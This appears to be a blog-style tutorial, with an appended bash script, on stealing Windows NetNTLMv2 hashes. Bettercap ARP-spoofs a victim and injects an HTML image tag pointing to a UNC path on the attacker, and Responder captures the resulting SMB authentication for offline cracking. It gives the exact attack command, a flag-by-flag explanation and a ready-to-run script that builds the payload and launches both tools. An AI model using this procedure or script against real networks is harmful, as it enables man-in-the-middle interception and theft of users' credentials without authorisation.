To steal hashes with Bettercap there are a few things we need first. In Kali we need Bettercap and Responder. Responder is installed by default; it may be worth grabbing the latest version from Git, but it isn't necessary. As for Bettercap, there is a version in the Kali repos, so we can simply run 'apt-get install bettercap'.
Once we have Bettercap we are ready to start our man-in-the-middle attack. We are going to use Bettercap to ARP spoof a Windows 10 machine, then use the HTTP proxy module within Bettercap to inject some HTML into the pages the victim loads. That HTML references a resource on our attacker machine by UNC path, so the victim's browser makes an outbound SMB request to us and authenticates with the signed-in user's credentials. What we capture is that user's NetNTLMv2 challenge/response (commonly just called "the hash"), which can then be cracked offline.
Let's break down the command in the screenshot above. These are Bettercap 1.x (the Ruby version) flags; the Go rewrite, Bettercap 2.x, which has since replaced it in the Kali repos, uses an interactive session and caplets instead, so check which version apt gave you.
bettercap -T 192.168.0.40 -X --proxy --proxy-module injecthtml --html-file lol.html --allow-local-connections
- -T: target host (192.168.0.40 in my case)
- -X: enable the sniffers
- --proxy: transparently proxy the target's HTTP traffic through our Kali machine
- --proxy-module injecthtml: load the 'injecthtml' proxy module
- --html-file lol.html: inject the contents of this file into the HTML pages that pass through the proxy
- --allow-local-connections: without this, any connection the target makes directly to our attacker machine is redirected to a rick-roll; we need those connections (the SMB request) to actually reach us
Inside lol.html we put:
Finally we need Responder running on the attacker machine, listening on SMB, so that when the Windows 10 machine connects to us it is served an NTLM challenge and the response is logged.
We can then browse to any HTTP (not HTTPS) website from the Windows 10 machine using Internet Explorer or Edge and the user's hash arrives in Responder automatically. HTTPS is out because the proxy cannot modify traffic inside TLS without a certificate the victim trusts, and the browser matters because Internet Explorer and the original (EdgeHTML) Edge will try to load a UNC (\\host\share) image referenced from an HTTP page, whereas Chrome and Firefox refuse to load file or UNC resources from web pages.
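The whole procedure as one script, added here as an example; it is not from the original post and not Bettercap's or Responder's own code. It assumes an attacker IP of 192.168.0.10, interface eth0, Kali's 'responder' wrapper and Bettercap 1.x. The page does not reproduce lol.html, so the one-pixel image tag pointing at a UNC path on the attacker is an assumption about the standard form this injection takes.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): the procedure as one script.
# Assumed values the page does not give: attacker IP 192.168.0.10, interface
# eth0, Kali's "responder" wrapper, and the contents of lol.html.
set -eu

ATTACKER_IP="${ATTACKER_IP:-192.168.0.10}"   # assumption: our Kali box
TARGET_IP="${TARGET_IP:-192.168.0.40}"       # the Windows 10 victim from the post
IFACE="${IFACE:-eth0}"                       # assumption
HTML_FILE="${HTML_FILE:-lol.html}"
DRY_RUN="${DRY_RUN:-1}"                      # 1 = print commands, 0 = run them (as root)

# Step 1: the injected HTML. An <img> whose src is a UNC path makes IE and
# legacy Edge hand the request to the SMB redirector, which authenticates to
# our box with the signed-in user's credentials. The page does not reproduce
# lol.html, so this payload is an assumption about what it contained.
make_payload() {
  ip="$1"; out="$2"
  # Inside double quotes "\\\\" is two backslashes, giving \\IP\share\pixel.png
  printf '<img src="%s" width="1" height="1" alt="">\n' \
    "\\\\${ip}\\share\\pixel.png" > "$out"
  cat "$out"
}

# Run a command, or just print it when DRY_RUN=1.
exec_or_echo() {
  if [ "$DRY_RUN" = "1" ]; then printf '%s\n' "$*"; else "$@"; fi
}

# Step 2: Responder owns SMB (445/139) on our interface and logs the
# NetNTLMv2 responses. Kali's smbd must not be holding 445 or it fails to bind.
start_responder() {
  exec_or_echo responder -I "$IFACE"
}

# Step 3: Bettercap 1.x with exactly the flags broken down above.
start_bettercap() {
  exec_or_echo bettercap -T "$TARGET_IP" -X --proxy --proxy-module injecthtml \
    --html-file "$HTML_FILE" --allow-local-connections
}

make_payload "$ATTACKER_IP" "$HTML_FILE"
if [ "$DRY_RUN" = "1" ]; then
  start_responder
  start_bettercap
else
  if ss -ltn 2>/dev/null | grep -q ':445 '; then
    echo "port 445 is already in use (smbd?); stop it before starting Responder" >&2
    exit 1
  fi
  start_responder &                 # Responder must be up before the victim connects
  resp_pid=$!
  trap 'kill "$resp_pid" 2>/dev/null' EXIT
  start_bettercap                   # foreground; Ctrl-C tears both down
fi
```

By default the script writes lol.html and prints the two commands so they can be checked against the breakdown above; DRY_RUN=0 runs them, Responder first in the background, and both need root. Once the victim loads any HTTP page in IE or legacy Edge, the NetNTLMv2 response shows up in Responder's output and log directory.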